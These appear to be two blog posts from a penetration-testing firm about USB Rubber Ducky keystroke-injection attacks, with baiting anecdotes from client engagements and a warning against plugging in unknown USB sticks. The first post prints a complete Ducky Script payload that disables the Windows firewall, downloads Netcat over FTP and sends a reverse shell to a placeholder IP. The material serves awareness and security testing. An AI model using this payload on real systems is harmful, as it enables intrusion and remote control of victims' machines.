December 23, 2015

Some customers think that the USB threat may have gone away after Windows 7 where autoplay/autorun is disabled by default. While this is true for most standard USB attack vectors it doesn’t apply to USB rubber ducky attacks.

What’s the difference?

The USB rubber ducky attack works different in that respect that it doesn’t execute an exe or similar file, but it emulates an external keyboard which is not flagged as malicious activity or as a virus by AV or endpoint protection. It’s like plugging an external keyboard in but rather then a user typing in the commands, the Rubber Ducky executes a set of commands instead.

The following raw code (prior to compiling) simply connects to an FTP server, downloads Netcat and then proceeds to send a shell to a specified IP and port receiver.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

We were recently engaged by a fortune 500 company for a Pentest with sound defenses in place, yet their laptops were compromised that way and a lot of juicy information could be harvested. FireEye, McAfee EPO and all the endpoint defenses they had in place couldn’t stop users plugging in a Rubber Ducky. Especially not when the Rubber Ducky is labeled with CEO salaries 2015, free Amazon Vouchers or free expedia vouchers. 8/10 USBs were plugged in and 8/10 shells were received.

The company has security in place and employees get taught to not plug in unknown devices, but hey….curiosity and the opportunity to gain something free beats any security policy….

For folks interested in the USB rubber ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649

Share

March 21, 2015

We have been using those in our assessment for quite a while, but we are still impressed how easy it is to compromise complete networks by just someone plugin in this USB stick as part of a social engineering assessment.

Back in the days an executable file was placed on a USB and once plugged into a machine auto-run executed it. Microsoft has since stopped the auto-run on newer OS versions, so you rely on users to click or open a payload, it must be crafted for the exact OS and so on. A pain.

Not with Rubby Ducky. Rubber Ducky recently helped us to compromise a lot of MacBooks at an audit, along with Microsoft Windows 8 machines and Admin Linux desktops. Why is it so easy? Well, because rubber ducky emulates a keyboard rather than executing a program. That means to the machine the ducky is inserted in, it’s like a user typing things, enabling the camera from the CLI, opening a reverse shell. This is what makes it so hard for OS’ to defend themselves against it.

We recently did a social engineering audit at a large insurance company. One of our ladies simple went to the non-restricted coffee break out area at the reception and put out 10 USB sticks with different tags on them such as: GRAB ME – I AM FREE or MANAGEMENT CONFIDENTIAL or LATEST 2015 EMPLOYEE PAYROLL. Guess what? All 10 USBs were taking within 15 minutes and only 2 hours later 8 of the 10 employees who took this “free gift” had inserted it into their machines and opened them up to us via reverse shell.

This once again shows that no defense is of any good, if employees plug in USBs they find in the coffee place. Now this was a large insurance company. Imagine private users in a Starbucks? Scary.

Those things cost around $45 USD each. Imaging a real hacking group purchasing 100 of them for malicious purposes.

We can only warn again and again. Don’t plug any USB sticks into your devices. Especially not ones you don’t know where they came from!

http://usbrubberducky.com

Share